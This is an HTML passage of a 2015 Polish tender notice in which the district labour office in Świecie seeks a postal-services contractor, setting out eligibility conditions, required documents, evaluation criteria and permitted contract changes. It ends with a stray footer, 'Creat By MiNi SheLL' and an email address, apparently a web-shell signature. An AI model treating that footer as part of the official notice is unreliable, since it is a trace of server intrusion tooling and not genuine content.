<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że posiada aktualny wpis do rejestru operatorów pocztowych wydany przez Prezesa Urzędu Komunikacji Elektronicznej w zakresie objętym przedmiotem zamówienia oraz na obszarze na którym będą świadczone przedmiotowe usługi pocztowe zgodnie z ustawą z dnia 23 listopada 2012r. Prawo pocztowe (Dz. U. z 2012r., poz. 1529). 
Ocena spełnienia ww. warunku dokonana będzie przez zamawiającego na podstawie aktualnego zaświadczenia o wpisie do rejestru operatorów pocztowych wydanego przez Prezesa Urzędu Komunikacji Elektronicznej, o którym mowa w art. 6 ust. 1 ustawy z dnia 23 listopada 2012 r. Prawo pocztowe (Dz. U. z 2012r. poz. 1529).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie szczególnych wymagań.Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu  warunków w trybie art. 22 ust 1 ustawy prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że na terenie powiatu świeckiego w niżej wymienionych lokalizacjach dysponuje lub będzie dysponował w okresie realizacji przedmiotu zamówienia minimum 11 placówkami służącymi do odbioru przesyłek awizowanych czynnymi codziennie w dni robocze od poniedziałku do piątku w godzinach minimum od 11:00 do 15:00. 
Miejsca występowania placówek w miejscowościach: Świecie (1 placówka), Nowe (1 placówka), Warlubie (1 placówka), Dragacz (1 placówka), Osie (1 placówka) Świekatowo (1 placówka), Drzycim (1 placówka); Bukowiec (1 placówka); Lniano(1 placówka); Jeżewo(1 placówka); Pruszcz (1 placówka). Ocena spełniania ww. warunku dokonana będzie przez zamawiającego na podstawie wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy (wraz ze wskazaniem adresu tj. ulica, nr budynku oraz godzinami otwarcia placówki do odbioru przesyłek awizowanych) w celu wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełniania ww. warunku dokonana będzie przez zamawiającego na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełniania ww. warunku dokonana będzie przez zamawiającego na podstawie oświadczenia wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 4, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.
2. W  przypadku  podpisania  oferty  oraz  poświadczenia  za  zgodność  z  oryginałem  kopii dokumentów  przez  osobę  nie  wymienioną  w  dokumencie  rejestracyjnym  (ewidencyjnym)  wykonawcy,  należy  do  oferty  dołączyć  stosowne  pełnomocnictwo  w  formie  oryginału  lub potwierdzonej notarialnie kopii.
3. Wykonawcy występujący wspólnie, zgodnie z art. 23 ustawy Pzp, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. 
4. Wykonawcy występujący wspólnie muszą załączyć do oferty pełnomocnictwo do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być załączone do oferty w formie oryginału lub kopii poświadczonej notarialnie. Pełnomocnictwo musi zawierać w szczególności: wskazanie ustanowionego pełnomocnika oraz zakres jego umocowania.
5. Wypełniony i podpisany formularz ofertowy wraz z załącznikami.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Liczba pracowników wykonawcy zatrudnionych w działalności operacyjnej wykonawcy na umowę o pracę według stanu na dzień 31.12.2014r. - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na  podstawie  art.  144  ustawy  Pzp,  Zamawiający  przewiduje  możliwość  dokonania  zmian postanowień  zawartej  Umowy w stosunku do  treści  oferty,  na  podstawie,  której  dokonano wyboru wykonawcy oraz określa warunki tych zmian: 
a) gdy nastąpi zmiana obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,  
b) aktualizacja danych wykonawcy poprzez zmianę nazwy, zmianę adresu, formy prawnej oraz godzin dostarczania przesyłek, jeżeli będą one wynikać ze zmian w strukturze Zamawiającego lub Wykonawcy itp.
c) zmiana cen jednostkowych brutto za świadczone usługi:
-	w przypadku zmiany stawki podatku VAT na usługi pocztowe może nastąpić zmiana cen jednostkowych odpowiednio do stawki podatku,
- zmiany cennika na usługi pocztowe ,zatwierdzonego przez Prezesa Urzędu Komunikacji Elektronicznej lub w sposób dopuszczony przez obowiązujące przepisy prawa pocztowego.
- w przypadku, jeśli konieczność wprowadzenia zmian umowy wynika z uregulowań prawnych w zakresie ustalania lub zatwierdzania cen za usługi pocztowe w rozumieniu ustawy Prawo Pocztowe, a także w przypadku, kiedy ich wprowadzenie wynika z okoliczności powodujących, iż zmiana ww. cen leży w interesie publicznym,
- ceny określone przez Wykonawcę w ofercie ulegną obniżeniu w toku realizacji zamówienia w przypadku, gdy opłaty pocztowe wynikające ze standardowego cennika lub regulaminu wykonawcy będą niższe od cen wynikających w przedłożonej ofercie. Wykonawca ma obowiązek wówczas stosować względem zamawiającego obniżone opłaty pocztowe dla usług, wynikające ze swojego aktualnego cennika lub regulaminu.
d) zmiana terminu obowiązywania umowy w wypadku gdy usługi objęte umową, zostały wstrzymane przez właściwy organ, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy,
e) zmiana lub rezygnacja z podwykonawcy -  na pisemny wniosek Wykonawcy, dopuszcza się  zmianę podwykonawcy lub rezygnacja z podwykonawcy przy realizacji przedmiotu zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń podwykonawcy wobec Wykonawcy z tytułu realizacji usługi lub pisemnym wyjaśnieniu Wykonawcy dotyczącym przyczyn rozwiązania umowy z podwykonawcą przez Wykonawcę oraz o braku roszczeń podwykonawcy wobec Wykonawcy z tytułu realizacji usługi. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę. Zmiany podwykonawcy można dokonać jedynie, jeżeli wykonywanie części usług przez podwykonawcę zostało wskazane przez Wykonawcę w ofercie. W wypadku gdy Wykonawca nie wskaże w ofercie iż zamierza powierzyć część usług podwykonawcom, ich wprowadzenie na etapie wykonywania umowy jest niedopuszczalne.  
f) w przypadku osób sprawujących nadzór nad realizacją umowy ze strony Wykonawcy zmiana którejkolwiek z osób musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana pisemnie przez Zamawiającego. 
g)zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy.
h) zmiany uzasadnione okolicznościami, o których mowa wart. 357 1 k.c. - Jeżeli  z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażąco stratą, czego strony nie przewidziały przy zawarciu umowy, sąd może po rozważeniu interesów stron, zgodnie z zasadami współżycia społecznego, oznaczać sposób wykonania zobowiązania, wysokość świadczenia lub nawet orzec o rozwiązaniu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pup.swiecie.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Świeciu 
ul. Wojska Polskiego 195a
86-100 Świecie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2015 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Świeciu 
ul. Wojska Polskiego 195a
86-100 Świecie
pok. nr 11 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com